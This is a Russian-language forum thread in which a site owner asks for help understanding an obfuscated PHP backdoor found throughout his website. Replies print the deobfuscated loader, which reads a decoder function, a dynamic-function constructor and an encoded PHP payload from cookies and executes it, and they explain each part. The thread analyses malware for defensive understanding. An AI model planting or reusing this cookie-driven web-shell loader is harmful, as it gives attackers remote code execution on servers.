Помогите понять код этого бэкдора

Статус
В этой теме нельзя размещать новые ответы.

Menro

web, seo, email, hack
Регистрация
27 Янв 2008
Сообщения
689
Реакции
138
Всем привет! Нашёл недавно бэкдор. Раскидали по всему сайту. Стало интересно, что это за код и как он работает. При этом каждый раскиданный файл был с разными названиями переменных, с трудом нашёл их все по ключу "$_COOKIE"...

Скрытое содержимое доступно для зарегистрированных пользователей!


Кто поможет записать этот код в нормальном, человекопонятном виде?
 

nejtr0n

Гуру форума
Регистрация
24 Янв 2014
Сообщения
129
Реакции
82
Код:
if($_COOKIE[sdvn]){
    $_COOKIE[sdvn]($_COOKIE[edgj])("",$_COOKIE[sdvn]($_COOKIE[exii]))();
}
 

KillDead

Хранитель порядка
Регистрация
11 Авг 2006
Сообщения
894
Реакции
579
Код:
if($_COOKIE[sdvn]){
    $_COOKIE[sdvn]($_COOKIE[edgj])("",$_COOKIE[sdvn]($_COOKIE[exii]))();
}

Сделали ещё непонятнее)

Вот такой код передаётся

Код:
$hzt = $_COOKIE[sdvn];
if ($hzt) {
    $isl = $hzt($_COOKIE[edgj]);
    $nwex = $hzt($_COOKIE[exii]);
    $zyiq = $isl("", $nwex);
    $zyiq();
}
Смысл - передаются названия функций и шеллкод. Создаётся динамическая функция, которая выполняет пхп код.
$_COOKIE[sdvn] - декодирущаяя функция, типо gzuncompress или base64decode
$_COOKIE[edgj] - аналог eval, но евал это конструкция языка, её вызвать нельзя динамически. А вот function_create - можно.
$_COOKIE[exii] - пхп код, на исполнение
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху